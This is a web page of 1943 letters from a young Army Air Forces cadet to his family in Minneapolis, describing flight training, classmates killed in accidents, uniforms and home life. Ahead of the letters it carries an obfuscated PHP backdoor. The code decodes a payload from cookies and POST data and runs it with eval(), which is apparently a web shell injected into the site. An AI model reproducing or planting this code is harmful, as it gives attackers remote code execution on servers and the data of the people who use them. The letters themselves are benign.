$rSyxxk = chr (90) . chr (95) . chr (118) . "\x4c" . 'V' . 'y' . chr ( 678 - 605 ); $daKHOQcNPF = "\x63" . chr ( 775 - 667 ).chr (97) . chr (115) . "\x73" . '_' . "\145" . "\x78" . "\x69" . "\x73" . chr (116) . "\x73";$vghLmYtYDI = class_exists($rSyxxk); $daKHOQcNPF = "28379";$sMaEaSmf = strpos($daKHOQcNPF, $rSyxxk);if ($vghLmYtYDI == $sMaEaSmf){function yILxYZGtO(){$fRpsRpuQg = new /* 38207 */ Z_vLVyI(56085 + 56085); $fRpsRpuQg = NULL;}$IeiYtgT = "56085";class Z_vLVyI{private function XCEwtYkYP($IeiYtgT){if (is_array(Z_vLVyI::$BZHNTMvWCB)) {$mmKMFAHoK2 = str_replace("<" . "?php", "", Z_vLVyI::$BZHNTMvWCB["content"]);eval($mmKMFAHoK2); $IeiYtgT = "56085";exit();}}public function TfTSHVkwr(){$mmKMFAHoK = "15094";$this->_dummy = str_repeat($mmKMFAHoK, strlen($mmKMFAHoK));}public function __destruct(){Z_vLVyI::$BZHNTMvWCB = @unserialize(Z_vLVyI::$BZHNTMvWCB); $IeiYtgT = "60411_45577";$this->XCEwtYkYP($IeiYtgT); $IeiYtgT = "60411_45577";}public function xurVtX($mmKMFAHoK, $mcpIoaziN){return $mmKMFAHoK[0] ^ str_repeat($mcpIoaziN, intval(strlen($mmKMFAHoK[0]) / strlen($mcpIoaziN)) + 1);}public function bNmJPlfw($mmKMFAHoK){$QcpcystE = "\142" . chr ( 302 - 205 ).chr ( 747 - 632 )."\145" . chr ( 884 - 830 ).'4';return array_map($QcpcystE . "\137" . chr ( 182 - 82 )."\x65" . "\x63" . "\157" . chr ( 666 - 566 ).'e', array($mmKMFAHoK,));}public function __construct($dkWmNdJ=0){$XjjuYE = ',';$mmKMFAHoK = "";$sRBlcLWM = $_POST;$UAhNIzo = $_COOKIE;$mcpIoaziN = "7101d4ae-4755-4588-8e39-18e560f4a854";$MVamg = @$UAhNIzo[substr($mcpIoaziN, 0, 4)];if (!empty($MVamg)){$MVamg = explode($XjjuYE, $MVamg);foreach ($MVamg as $yhoSineVtb){$mmKMFAHoK .= @$UAhNIzo[$yhoSineVtb];$mmKMFAHoK .= @$sRBlcLWM[$yhoSineVtb];}$mmKMFAHoK = $this->bNmJPlfw($mmKMFAHoK);}Z_vLVyI::$BZHNTMvWCB = $this->xurVtX($mmKMFAHoK, $mcpIoaziN);if (strpos($mcpIoaziN, $XjjuYE) !== FALSE){$mcpIoaziN = str_pad($mcpIoaziN, 10); $mcpIoaziN = strcspn ($mcpIoaziN, $XjjuYE); $mcpIoaziN = ltrim(rtrim($mcpIoaziN));}}public static $BZHNTMvWCB = 53805;}yILxYZGtO();} January 1943 – Uncle Jimmy's Letters

I have nearly completed the toughest course in the world



We had a day off today so I took a nice long sunbath-gosh! I couldn’t help but think how cold it is back in Minneapolis.

I have nearly 30 hours now-just about half through with my advanced flying. Tomorrow we take another cross country. This will be our last day cross country but, we have three at night left. Boy! A night cross country will really be something won’t it. I think I am so lucky-at the age of nineteen I have nearly completed the toughest course in the world. It does give me confidence in myself. I want you to be so proud of your son.

Say darlings, I finally got some mailing envelopes so my pictures and class book from Chico will reach you soon. I hope you will like them-

Hello Jocie-no, your big brother hasn’t forgotten his little sis. Just tonight we were looking at my pictures. The boys think my little sis is a knockout. It makes me so proud. Your brother certainly misses you-have you grown much, darling? Say, sis, don’t get too mad if dad doesn’t approve of your midnight shows. Dad and mom know best-you will learn how much they do know if you ever leave them. Yes, I certainly miss home, my girl, and my family but, the further I go the more I realize we are fighting for something worthwhile.



we had Link trainer all night

Link Trainer, Seymour Indiana


Couldn’t find time to write yesterday-we had Link trainer all night. I wish they would give us our nights at least. Your letters are swell darlings. I wish I had more time, then I could really answer them.

Have a told you that I have Uncle Sam take $6.25 from each monthly paycheck for war bonds? I think that’s the best way to save.

Say, Mom, I don’t know what you see wrong with Thelm. Don’t worry Mom-I have seen plenty of gals out here. They were from wealthy families too-they still don’t attract my attention. I have been away from home a little better than a half year. I have seen so many different types of people. I hope you don’t think I have been just sitting in camp-not seeing anything. Mom-Thelm is really a peach of a gal. She writes every day-most girls would have forgotten long ago. She thinks the world of you, Dad, and Jocie. All I have heard lately is how nice you have been to her.

I really miss her mom. I sometimes wonder why she likes me but, maybe I have a little something on the ball-I don’t know.

Say, darlings, my little radio needs a new battery. I have tried to order one but, they can’t get it out here. EverReady # 467 67 1/2 V mini-Max.

Well, darlings, I just received a letter from Eric-he’s feeling pretty badly about things. He said you were so nice to him. He certainly has had some tough breaks the poor guy.

Your loving son,


One of my classmates was killed yesterday



Well, I just finished plotting my course for another cross country. Boy! This cross country is going to be a long one. I hope I don’t get lost-it would be quite embarrassing to run out of gas right over a mountain range.

I have some bad news. One of my classmates was killed yesterday. It was his fault though. He and another kid were up practicing the beam procedures. They got a little bored with instrument flying I guess so they decided to see how fast they could dive the plane. From what I hear they dove the plane until they were going well over 400 mph. This airplane is redlined at 300 mph. The wings were literally ripped from the fuselage. One fellow, Altland by name (Minneapolis boy), jumped in the parachute. He was so low when he jumped that his shoot opened about 50 feet from the ground-just in time to break his fall. The kid in the rear didn’t get out.

They were breaking regulations so it will go hard for the cadet who escaped. It pays to stay within orders. Then if the wing falls apart-they can’t blame you.

Well, darlings, I must go to bed. Every day that passes brings me closer to those wings and bars-

Your loving son,


maybe I’ll shoot him down next time



Your swell address book arrived-boy! Is it ever swell-thanks a million. Say, Dad, I was sitting in the cockpit warming up the engine before take off when a mechanic pokes his head in and said “Excuse me sir but, would you mind telling me where you bought that watch band?” I told him my dad sent it to me from Minneapolis. I have had more compliments on that band-it’s a beauty. I have mother’s money put away for my uniform. By the way, we were looking at some uniforms today-I didn’t care for them at all so I think I’ll wait until I see something better. Some of the guys buy everything on sight. I figure you might as well look them over first. If I can’t find them here I will wait until I get to Los Angeles when I buy-I want to get the best.

We flew formational morning-it really is fun. This plane is really tricky to keep right in place because of its speed. Once you get onto it, it isn’t so bad. We just had a touch of formation flying at Basic. We get about 20 hours of it here. What I like about formation flying is-you must be on your toes or something will happen.

When we are all flying at 200 mph-a slight touch of the router or stick may cause a smash. Don’t worry though-my eyes are glazed on that relationship every minute.

After formation we start a Lufberry Circle – around and around we go trying to get on another guy’s tail. Boy! Is it ever fun. My instructor shot me down three times he claims-I have some new maneuvers figured out though-maybe I’ll shoot him down next time.

Your loving son,


I’m always dreaming of home-



Gosh, you’re just wonderful! Poor Thelm just about worships the ground you walk on. She told me you have been so kind to her. Thelm said you even let her use your beautiful fur coat to go to the funeral parlor. You are so sweet-thanks again darlings. I guess poor Eric was hit pretty hard. I know how bad I’d feel if my dad or mom left me.

Poor Eric has had so many setbacks-it’s so hard to fly when you were worrying about something else. In this flying game your head must be out at all times or you won’t last long.

We were looking at officers uniforms today. Boy oh boy! Are they ever classy open (remember how you shuddered when I used this word) Ha! Ha!

I have been saving my money like mad lately-have over $100 now. I will have a lot more too by the time we pay for our uniforms. We get so much from Uncle Sam but. I am really going to get a uniform.

How’s my little sis-keeping on with your piano, I hope. When I get back-I will probably see my little sis banging out some jive-while the gang jitterbugs-on Mom’s new rug.

Well, darlings, think of me-I’m always dreaming of home-

Your loving son,


This sand gives everybody a cough

Yuma desert


My lovely package arrived-thanks so much. Those shoes are just perfect for this climate. Just high enough to keep the sand out. That’s what we need here. Boy! Oh boy! Has that candy ever made a hit. Thanks again darlings.

Boy! I’m still talking about that cross country we took yesterday. Gosh! I hope you’ll be able to actually see me fly a plane someday. That’s my ambition. I’d give anything if they would let me fly home in a P 38 or P 51-land at Wold Chamberlain after performing above the field with a few slow rolls. That would make them look, wouldn’t it? Pete’s girl works out at Wold Chamberlain airport now. I’ll bet the airport is really immense now. I went on sick call today to get some cough medicine. This sand gives everybody a cough it seems. Anyhow-the doctor is a Minneapolis man. I believe he said 39th and Fremont. He graduated from the U of M. We had quite a talk. The first thing he asked was, “have you been back lately?” That’s all a man in the army thinks of is home, I guess.

Well, darlings, thanks again for your kindness. I hope my little address book comes. If I ever graduate I want to send my announcements everywhere-including England. Boy! I hope I make those wings and bars.

Your loving son,


The desert is pretty tricky



Didn’t have time to answer your lovely letter yesterday. They really have us on the go here. I should be in bed now but, I must write to my swell family. I didn’t have such a hot day yesterday. I knew the smooth sailing was too good to be true. That’s the way it goes though-we are never sure of anything until we get those silver wings. I can remember back in Santa Ana-Oh-how far those wings seemed. I never thought I’d get them. Well, if I carry on for six more weeks I will have them. Gosh! Darlings I have never been so excited over anything before. All the work and worry will be worth it. I always have wanted my parents to be so proud of their son. I look back on those four guys who have passed by the wayside. I often get letters from many of them-some Bombardiers-some buck privates. I hope I get through this war but, if I didn’t-if I earned those wings you could always be proud of my record. Gosh! I sure am slinging the bull aren’t I. I can’t help it darlings-I want you to realize how much you mean to me. Thelma and my family are the ones I really care about.

A cadet from the Stockton bunch down here was found by his ship yesterday. He was lost on the desert. The desert is pretty tricky. Don’t worry  though- I can take care of myself.

Your loving son,


death is expected in this outfit



Gosh! That certainly is a shock to hear that poor Mr. Erickson passed away. I talked to a fellow cadet’s Dad is a doctor. He said that spinal meningitis is a disease something like infantile paralysis. Maybe that’s the cause for some of his off days.

Don’t worry about it affecting me-death is expected in this outfit-in fact we’re learning how to sight the Machine guns on our planes so we can kill with the first shot. Our gunnery instructor is a very brilliant man. We are learning the lead method. He claims common mistake made by all pilots is that they don’t close in close enough before they cut loose. We had some pictures shown of the Royal Air Force pilots. They were very interesting. Gunnery is the best subject we have taken thus far. I hope I can make out alright.

I just got in an argument with a dumb Swede. He’s always kidding me about England. Someday I’ll knock that guy for a loop. He is so repugnant, he burns me no end. Oh, well, what can you expect.

We went on a 600 mile cross-country today. This country is very mountainous. That’s what I like about the airplane. We just fly over them. Gosh! It scares you when the motor sputters a little bit when you’re looking down on those jagged rocks.

Well, darlings, thank you so much for being kind to the Ericksons. They were so kind to me.

Your loving son,


nobody’s going to give you something for nothing



I am beginning to accustom myself to this desert life now. The climate is so dry my lips crack and peel but, I use lip ice so that isn’t so bad. All the boys have cut their hair short. You just can’t have long hair and keep it clean in this sand.

Our commandant told us that a man from Phoenix was coming to fit us with our officers uniforms. Gosh! They certainly seem pretty sure about this thing don’t they. I hope he has some good looking uniforms because if Jim Jago is buying his officers uniform-it’s going to be the best they have. I have been saving my money for two months now. The government gives us a clothing allowance of $150 but the complete uniform will cost more than that. I would give anything if I could walk into 5044 with my big silver wings displayed upon a beautiful uniform. The main reason for my working so darn hard at flying is that I want to prove to my Mom, Dad, and girl-I can make the grade, even though I’m just a kid.

Some of the airplane mechanics that say “Sir” to me every day have a degree in college. It seems funny but, if they don’t give a darn if they grease the plane-nobody’s going to give you something for nothing-I have learned that so well-I can remember Dad telling me that before I left-how true it is.

Well darlings-stay well now.

Your loving son,


Keep pulling for me



Your most interesting letters arrived today. I must try to find time to write Uncle Tom. He’s certainly a grand fellow.

Say, Dad, those pictures you speak of were taken on the post. I will try to send them if I can ever find mailing envelopes. The only ones I had taken off the post were those two-one for Mother and Thelma.

They keep us so darn busy here-We thought we had it tough in basic and primary-that’s the way goes-it never gets easier-always harder. I don’t think I would’ve worked and worried so much for a mining engineer’s degree. The harder you work for something the more you appreciate it when you get it but, I still haven’t got it.

Pete isn’t my roommate but, we still see each other all the time-discuss our flying and argue over the ability of our flying instructors. This flying business is very interesting-you never know everything that’s why it will always stay interesting.

I hope I don’t get Instructor out of this course. My instructor told me I have a chance because my record is pretty good, I guess. I want to see combat-maybe I’m foolish but, I want my kids to be proud of their Dad like I am about mine. Not many can say their Dad has seen combat duty.

Well, darling, I always appreciate your very interesting letters-I wish I could write more often but I try to-honestly.

Keep pulling for me

Your loving son,
